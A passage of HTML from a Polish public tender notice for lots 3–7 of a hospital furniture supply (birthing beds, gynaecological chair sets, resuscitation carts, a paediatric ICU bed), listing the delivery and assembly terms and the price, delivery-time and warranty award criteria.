wynikające z naruszenia praw własności intelektualnej lub przemysłowej, w tym praw autorskich, patentów, praw ochronnych na znaki towarowe oraz praw z rejestracji na wzory użytkowe i przemysłowe, pozostające w związku z wprowadzeniem mebli do obrotu na terytorium Rzeczypospolitej Polskiej; za ewentualne roszczenia osób trzecich wynikające z praw autorskich lub patentowych, dotyczące przedmiotu dostawy odpowiada wyłącznie Wykonawca; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39112000-0 - Krzesła</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty na podstawie<br/>kryteriów oceny ofert określonych w dokumentach zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, montaż i ustawienie przez Wykonawcę fabrycznie nowych <br/>łóżek porodowych. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 6.3 do SWZ<br/>Pozostałe warunki zostały określone w projektowanych postanowieniach umowy (zał. nr 7 do SWZ)<br/>Wymagania i warunki realizacji zamówienia: <br/>	realizacja przedmiotu zamówienia nastąpi w terminie zaoferowanym przez Wykonawcę, jednak nie później niż 90 dni kalendarzowych od dnia zawarcia umowy. Za dzień realizacji przedmiotu zamówienia uznany będzie dzień, w którym Wykonawca dostarczy, zmontuje i ustawi w miejscach wskazanych przez Zamawiającego przedmiot zamówienia (termin stanowi kryterium oceny ofert); <br/>	oferowane meble muszą być fabrycznie nowe i nieużywane. Nie mogą pochodzić z odzysku, nie mogą pochodzić z projektów realizowanych u innych klientów, nie mogą pochodzić z ekspozycji w punktach sprzedaży oraz muszą być wolne od jakichkolwiek wad fizycznych i prawnych czy roszczeń osób trzecich, muszą być wykonane z materiałów posiadających wszelkie wymagane prawem certyfikaty i aprobaty dopuszczające do sprzedaży i użytkowania na terenie Rzeczypospolitej Polskiej; <br/>	wymagane jest, aby meble zostały dostarczone do Zamawiającego wraz z rozładunkiem (wniesieniem do miejsca wskazanego przez Zamawiającego) i montażem. Przez montaż należy rozumieć: instalację kompletnych i gotowych do użycia mebli z uwzględnieniem ich dostosowania do pomieszczeń, w których będą użytkowane oraz do elementów znajdujących się w tych pomieszczeniach. Montaż będzie polegał w szczególności na: ustawieniu, wypoziomowaniu oraz ustawieniu w sposób zapewniający bezpieczeństwo podczas ich użytkowania poszczególnych elementów wyposażenia będących przedmiotem zamówienia; <br/>	Zamawiający wymaga, aby przedmiot zamówienia był wykonany starannie, z dużą dbałością o szczegóły i z materiałów opisanych w sposób szczegółowy w Opisie przedmiotu zamówienia. W celu zobrazowania walorów wizualnych i estetycznych koniecznych do osiągnięcia przez Wykonawcę, Zamawiający zamieścił w Opisie przedmiotu zamówienia rysunki poglądowe; <br/>	Wykonawca przed przystąpieniem do realizacji przedmiotu zamówienia zobowiązany będzie <br/>do skontaktowania się z Zamawiającym w celu uściślenia szczegółów w zakresie wykonania mebli, dokonania dokładnego pomiaru, uzgodnienia kolorów płyt meblowych i tapicerki. Wszelkie uwagi oraz wymagania Zamawiającego zgłoszone w ramach w/w zakresu Wykonawca będzie zobowiązany uwzględnić w trakcie realizacji przedmiotu zamówienia. Wybór zostanie dokonany na podstawie przedstawionych przez Wykonawcę próbników płyt oraz tkanin tapicerskich. Próbniki tkanin muszą posiadać atesty lub sprawozdania z badań potwierdzające skład oraz wymaganą wytrzymałość na ścieranie;<br/>	Wykonawca odpowiada za wszelkie wady prawne zaoferowanych i dostarczonych mebli, w tym również za ewentualne roszczenia osób trzecich wynikające z naruszenia praw własności intelektualnej lub przemysłowej, w tym praw autorskich, patentów, praw ochronnych na znaki towarowe oraz praw z rejestracji na wzory użytkowe i przemysłowe, pozostające w związku z wprowadzeniem mebli do obrotu na terytorium Rzeczypospolitej Polskiej; za ewentualne roszczenia osób trzecich wynikające z praw autorskich lub patentowych, dotyczące przedmiotu dostawy odpowiada wyłącznie Wykonawca. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33192000-2 - Meble medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty na podstawie<br/>kryteriów oceny ofert określonych w dokumentach zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, montaż i ustawienie przez Wykonawcę fabrycznie nowych <br/>zestawów do porodów w pozycji wertykalnej; Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 6.4 do SWZ<br/>Pozostałe warunki zostały określone w projektowanych postanowieniach umowy (zał. nr 7 do SWZ)<br/>Wymagania i warunki realizacji zamówienia: <br/>	realizacja przedmiotu zamówienia nastąpi w terminie zaoferowanym przez Wykonawcę, jednak nie później niż 90 dni kalendarzowych od dnia zawarcia umowy. Za dzień realizacji przedmiotu zamówienia uznany będzie dzień, w którym Wykonawca dostarczy, zmontuje i ustawi w miejscach wskazanych przez Zamawiającego przedmiot zamówienia (termin stanowi kryterium oceny ofert); <br/>	oferowane meble muszą być fabrycznie nowe i nieużywane. Nie mogą pochodzić z odzysku, nie mogą pochodzić z projektów realizowanych u innych klientów, nie mogą pochodzić z ekspozycji w punktach sprzedaży oraz muszą być wolne od jakichkolwiek wad fizycznych i prawnych czy roszczeń osób trzecich, muszą być wykonane z materiałów posiadających wszelkie wymagane prawem certyfikaty i aprobaty dopuszczające do sprzedaży i użytkowania na terenie Rzeczypospolitej Polskiej; <br/>	wymagane jest, aby meble zostały dostarczone do Zamawiającego wraz z rozładunkiem (wniesieniem do miejsca wskazanego przez Zamawiającego) i montażem. Przez montaż należy rozumieć: instalację kompletnych i gotowych do użycia mebli z uwzględnieniem ich dostosowania do pomieszczeń, w których będą użytkowane oraz do elementów znajdujących się w tych pomieszczeniach. Montaż będzie polegał w szczególności na: ustawieniu, wypoziomowaniu oraz ustawieniu w sposób zapewniający bezpieczeństwo podczas ich użytkowania poszczególnych elementów wyposażenia będących przedmiotem zamówienia; <br/>	Zamawiający wymaga, aby przedmiot zamówienia był wykonany starannie, z dużą dbałością o szczegóły i z materiałów opisanych w sposób szczegółowy w Opisie przedmiotu zamówienia. W celu zobrazowania walorów wizualnych i estetycznych koniecznych do osiągnięcia przez Wykonawcę, Zamawiający zamieścił w Opisie przedmiotu zamówienia rysunki poglądowe; <br/>	Wykonawca przed przystąpieniem do realizacji przedmiotu zamówienia zobowiązany będzie <br/>do skontaktowania się z Zamawiającym w celu uściślenia szczegółów w zakresie wykonania mebli, dokonania dokładnego pomiaru, uzgodnienia kolorów płyt meblowych i tapicerki. Wszelkie uwagi oraz wymagania Zamawiającego zgłoszone w ramach w/w zakresu Wykonawca będzie zobowiązany uwzględnić w trakcie realizacji przedmiotu zamówienia. Wybór zostanie dokonany na podstawie przedstawionych przez Wykonawcę próbników płyt oraz tkanin tapicerskich. Próbniki tkanin muszą posiadać atesty lub sprawozdania z badań potwierdzające skład oraz wymaganą wytrzymałość na ścieranie;<br/>	Wykonawca odpowiada za wszelkie wady prawne zaoferowanych i dostarczonych mebli, w tym również za ewentualne roszczenia osób trzecich wynikające z naruszenia praw własności intelektualnej lub przemysłowej, w tym praw autorskich, patentów, praw ochronnych na znaki towarowe oraz praw z rejestracji na wzory użytkowe i przemysłowe, pozostające w związku z wprowadzeniem mebli do obrotu na terytorium Rzeczypospolitej Polskiej; za ewentualne roszczenia osób trzecich wynikające z praw autorskich lub patentowych, dotyczące przedmiotu dostawy odpowiada wyłącznie Wykonawca; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33192000-2 - Meble medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty na podstawie<br/>kryteriów oceny ofert określonych w dokumentach zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, montaż i ustawienie przez Wykonawcę fabrycznie nowych <br/>zestawów do fotela ginekologicznego; Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 6.5 do SWZ<br/>Pozostałe warunki zostały określone w projektowanych postanowieniach umowy (zał. nr 7 do SWZ)<br/>Wymagania i warunki realizacji zamówienia: <br/>	realizacja przedmiotu zamówienia nastąpi w terminie zaoferowanym przez Wykonawcę, jednak nie później niż 90 dni kalendarzowych od dnia zawarcia umowy. Za dzień realizacji przedmiotu zamówienia uznany będzie dzień, w którym Wykonawca dostarczy, zmontuje i ustawi w miejscach wskazanych przez Zamawiającego przedmiot zamówienia (termin stanowi kryterium oceny ofert); <br/>	oferowane meble muszą być fabrycznie nowe i nieużywane. Nie mogą pochodzić z odzysku, nie mogą pochodzić z projektów realizowanych u innych klientów, nie mogą pochodzić z ekspozycji w punktach sprzedaży oraz muszą być wolne od jakichkolwiek wad fizycznych i prawnych czy roszczeń osób trzecich, muszą być wykonane z materiałów posiadających wszelkie wymagane prawem certyfikaty i aprobaty dopuszczające do sprzedaży i użytkowania na terenie Rzeczypospolitej Polskiej; <br/>	wymagane jest, aby meble zostały dostarczone do Zamawiającego wraz z rozładunkiem (wniesieniem do miejsca wskazanego przez Zamawiającego) i montażem. Przez montaż należy rozumieć: instalację kompletnych i gotowych do użycia mebli z uwzględnieniem ich dostosowania do pomieszczeń, w których będą użytkowane oraz do elementów znajdujących się w tych pomieszczeniach. Montaż będzie polegał w szczególności na: ustawieniu, wypoziomowaniu oraz ustawieniu w sposób zapewniający bezpieczeństwo podczas ich użytkowania poszczególnych elementów wyposażenia będących przedmiotem zamówienia; <br/>	Zamawiający wymaga, aby przedmiot zamówienia był wykonany starannie, z dużą dbałością o szczegóły i z materiałów opisanych w sposób szczegółowy w Opisie przedmiotu zamówienia. W celu zobrazowania walorów wizualnych i estetycznych koniecznych do osiągnięcia przez Wykonawcę, Zamawiający zamieścił w Opisie przedmiotu zamówienia rysunki poglądowe; <br/>	Wykonawca przed przystąpieniem do realizacji przedmiotu zamówienia zobowiązany będzie <br/>do skontaktowania się z Zamawiającym w celu uściślenia szczegółów w zakresie wykonania mebli, dokonania dokładnego pomiaru, uzgodnienia kolorów płyt meblowych i tapicerki. Wszelkie uwagi oraz wymagania Zamawiającego zgłoszone w ramach w/w zakresu Wykonawca będzie zobowiązany uwzględnić w trakcie realizacji przedmiotu zamówienia. Wybór zostanie dokonany na podstawie przedstawionych przez Wykonawcę próbników płyt oraz tkanin tapicerskich. Próbniki tkanin muszą posiadać atesty lub sprawozdania z badań potwierdzające skład oraz wymaganą wytrzymałość na ścieranie;<br/>	Wykonawca odpowiada za wszelkie wady prawne zaoferowanych i dostarczonych mebli, w tym również za ewentualne roszczenia osób trzecich wynikające z naruszenia praw własności intelektualnej lub przemysłowej, w tym praw autorskich, patentów, praw ochronnych na znaki towarowe oraz praw z rejestracji na wzory użytkowe i przemysłowe, pozostające w związku z wprowadzeniem mebli do obrotu na terytorium Rzeczypospolitej Polskiej; za ewentualne roszczenia osób trzecich wynikające z praw autorskich lub patentowych, dotyczące przedmiotu dostawy odpowiada wyłącznie Wykonawca; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33192000-2 - Meble medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty na podstawie<br/>kryteriów oceny ofert określonych w dokumentach zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, montaż i ustawienie przez Wykonawcę fabrycznie nowych <br/>wózków reanimacyjnych; Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 6.6 do SWZ<br/>Pozostałe warunki zostały określone w projektowanych postanowieniach umowy (zał. nr 7 do SWZ)<br/>Wymagania i warunki realizacji zamówienia: <br/>	realizacja przedmiotu zamówienia nastąpi w terminie zaoferowanym przez Wykonawcę, jednak nie później niż 90 dni kalendarzowych od dnia zawarcia umowy. Za dzień realizacji przedmiotu zamówienia uznany będzie dzień, w którym Wykonawca dostarczy, zmontuje i ustawi w miejscach wskazanych przez Zamawiającego przedmiot zamówienia (termin stanowi kryterium oceny ofert); <br/>	oferowane meble muszą być fabrycznie nowe i nieużywane. Nie mogą pochodzić z odzysku, nie mogą pochodzić z projektów realizowanych u innych klientów, nie mogą pochodzić z ekspozycji w punktach sprzedaży oraz muszą być wolne od jakichkolwiek wad fizycznych i prawnych czy roszczeń osób trzecich, muszą być wykonane z materiałów posiadających wszelkie wymagane prawem certyfikaty i aprobaty dopuszczające do sprzedaży i użytkowania na terenie Rzeczypospolitej Polskiej; <br/>	wymagane jest, aby meble zostały dostarczone do Zamawiającego wraz z rozładunkiem (wniesieniem do miejsca wskazanego przez Zamawiającego) i montażem. Przez montaż należy rozumieć: instalację kompletnych i gotowych do użycia mebli z uwzględnieniem ich dostosowania do pomieszczeń, w których będą użytkowane oraz do elementów znajdujących się w tych pomieszczeniach. Montaż będzie polegał w szczególności na: ustawieniu, wypoziomowaniu oraz ustawieniu w sposób zapewniający bezpieczeństwo podczas ich użytkowania poszczególnych elementów wyposażenia będących przedmiotem zamówienia; <br/>	Zamawiający wymaga, aby przedmiot zamówienia był wykonany starannie, z dużą dbałością o szczegóły i z materiałów opisanych w sposób szczegółowy w Opisie przedmiotu zamówienia. W celu zobrazowania walorów wizualnych i estetycznych koniecznych do osiągnięcia przez Wykonawcę, Zamawiający zamieścił w Opisie przedmiotu zamówienia rysunki poglądowe; <br/>	Wykonawca przed przystąpieniem do realizacji przedmiotu zamówienia zobowiązany będzie <br/>do skontaktowania się z Zamawiającym w celu uściślenia szczegółów w zakresie wykonania mebli, dokonania dokładnego pomiaru, uzgodnienia kolorów płyt meblowych i tapicerki. Wszelkie uwagi oraz wymagania Zamawiającego zgłoszone w ramach w/w zakresu Wykonawca będzie zobowiązany uwzględnić w trakcie realizacji przedmiotu zamówienia. Wybór zostanie dokonany na podstawie przedstawionych przez Wykonawcę próbników płyt oraz tkanin tapicerskich. Próbniki tkanin muszą posiadać atesty lub sprawozdania z badań potwierdzające skład oraz wymaganą wytrzymałość na ścieranie;<br/>	Wykonawca odpowiada za wszelkie wady prawne zaoferowanych i dostarczonych mebli, w tym również za ewentualne roszczenia osób trzecich wynikające z naruszenia praw własności intelektualnej lub przemysłowej, w tym praw autorskich, patentów, praw ochronnych na znaki towarowe oraz praw z rejestracji na wzory użytkowe i przemysłowe, pozostające w związku z wprowadzeniem mebli do obrotu na terytorium Rzeczypospolitej Polskiej; za ewentualne roszczenia osób trzecich wynikające z praw autorskich lub patentowych, dotyczące przedmiotu dostawy odpowiada wyłącznie Wykonawca; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33192000-2 - Meble medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty na podstawie<br/>kryteriów oceny ofert określonych w dokumentach zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, montaż i ustawienie przez Wykonawcę fabrycznie nowego<br/>łóżka pediatrycznego OIOM; Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 6.7 do SWZ<br/>Pozostałe warunki zostały określone w projektowanych postanowieniach umowy (zał. nr 7 do SWZ)<br/>Wymagania i warunki realizacji zamówienia: <br/>	realizacja przedmiotu zamówienia nastąpi w terminie zaoferowanym przez Wykonawcę, jednak nie później niż 90 dni kalendarzowych od dnia zawarcia umowy. Za dzień realizacji przedmiotu zamówienia uznany będzie dzień, w którym Wykonawca dostarczy, zmontuje i ustawi w miejscach wskazanych przez Zamawiającego przedmiot zamówienia (termin stanowi kryterium oceny ofert); <br/>	oferowane meble muszą być fabrycznie nowe i nieużywane. Nie mogą pochodzić z odzysku, nie mogą pochodzić z projektów realizowanych u innych klientów, nie mogą pochodzić z ekspozycji w punktach sprzedaży oraz muszą być wolne od jakichkolwiek wad fizycznych i prawnych czy roszczeń osób trzecich, muszą być wykonane z materiałów posiadających wszelkie wymagane prawem certyfikaty i aprobaty dopuszczające do sprzedaży i użytkowania na terenie Rzeczypospolitej Polskiej; <br/>	wymagane jest, aby meble zostały dostarczone do Zamawiającego wraz z rozładunkiem (wniesieniem do miejsca wskazanego przez Zamawiającego) i montażem. Przez montaż należy rozumieć: instalację kompletnych i gotowych do użycia mebli z uwzględnieniem ich dostosowania do pomieszczeń, w których będą użytkowane oraz do elementów znajdujących się w tych pomieszczeniach. Montaż będzie polegał w szczególności na: ustawieniu, wypoziomowaniu oraz ustawieniu w sposób zapewniający bezpieczeństwo podczas ich użytkowania poszczególnych elementów wyposażenia będących przedmiotem zamówienia; <br/>	Zamawiający wymaga, aby przedmiot zamówienia był wykonany starannie, z dużą dbałością o szczegóły i z materiałów opisanych w sposób szczegółowy w Opisie przedmiotu zamówienia. W celu zobrazowania walorów wizualnych i estetycznych koniecznych do osiągnięcia przez Wykonawcę, Zamawiający zamieścił w Opisie przedmiotu zamówienia rysunki poglądowe; <br/>	Wykonawca przed przystąpieniem do realizacji przedmiotu zamówienia zobowiązany będzie <br/>do skontaktowania się z Zamawiającym w celu uściślenia szczegółów w zakresie wykonania mebli, dokonania dokładnego pomiaru, uzgodnienia kolorów płyt meblowych i tapicerki. Wszelkie uwagi oraz wymagania Zamawiającego zgłoszone w ramach w/w zakresu Wykonawca będzie zobowiązany uwzględnić w trakcie realizacji przedmiotu zamówienia. Wybór zostanie dokonany na podstawie przedstawionych przez Wykonawcę próbników płyt oraz tkanin tapicerskich. Próbniki tkanin muszą posiadać atesty lub sprawozdania z badań potwierdzające skład oraz wymaganą wytrzymałość na ścieranie;<br/>	Wykonawca odpowiada za wszelkie wady prawne zaoferowanych i dostarczonych mebli, w tym również za ewentualne roszczenia osób trzecich wynikające z naruszenia praw własności intelektualnej lub przemysłowej, w tym praw autorskich, patentów, praw ochronnych na znaki towarowe oraz praw z rejestracji na wzory użytkowe i przemysłowe, pozostające w związku z wprowadzeniem mebli do obrotu na terytorium Rzeczypospolitej Polskiej; za ewentualne roszczenia osób trzecich wynikające z praw autorskich lub patentowych, dotyczące przedmiotu dostawy odpowiada wyłącznie Wykonawca; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33192000-2 - Meble medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty na podstawie<br/>kryteriów oceny ofert określonych w dokumentach zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span 